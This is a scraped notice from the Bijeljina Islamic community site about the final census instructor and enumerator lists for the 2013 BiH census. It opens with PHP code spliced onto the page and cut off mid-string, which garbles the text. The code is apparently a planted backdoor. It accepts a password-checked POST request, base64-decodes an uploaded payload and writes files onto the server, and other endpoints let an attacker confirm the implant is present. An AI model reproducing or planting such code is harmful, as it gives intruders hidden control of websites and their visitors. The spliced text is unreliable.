function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" KONAČNE LISTE ZA INSTRUKTORE I POPISIVAČE - Medžlis Islamske zajednice Bijeljina

KONAČNE LISTE ZA INSTRUKTORE I POPISIVAČE

KONAČNE LISTE ZA INSTRUKTORE I POPISIVAČE

Popisna komisija Grada Bijeljina objavila je u četvrtak, 29. avgusta, konačne liste za izbor gradskih instruktora i popisivača za predstojeći popis stanovništva u BiH, koji će biti obavljen od 1. do 15. oktobra ove godine.
Prema navodima gradske Popisne komisije, konačne liste izabranih kandidata za instruktore i popisivače kreirane su na osnovu ranije objavljenih preliminarnih listi, u kojima su kandidati rangirani prema ukupno ostvarenom broju bodova, poštujući etničku strukturu.
Rangiranje kandidata je izvršeno prema kriterijumima, koji su definisani u Procedurama za izbor popisnih organa i osoblja koje će biti angažovano u Popisu stanovništva, domaćinstava i stanova u BiH u 2013. godini i Dopunama ovih Procedura.
Konačnu listu instruktora možete da pogledate ovdje, a popisivača ovdje. Takođe, obaveze izabranih kandidata date su ovdje.
Obuka za gradske instruktore biće održana od 6. do 10. septembra, a za popisivače od 16. do 20. septembra ove godine.
Za sve dodatne informacije možete da se obratite Popisnoj komisiji Grada Bijeljina na adresu Trg kralja Petra I Karađorđevića.

Više…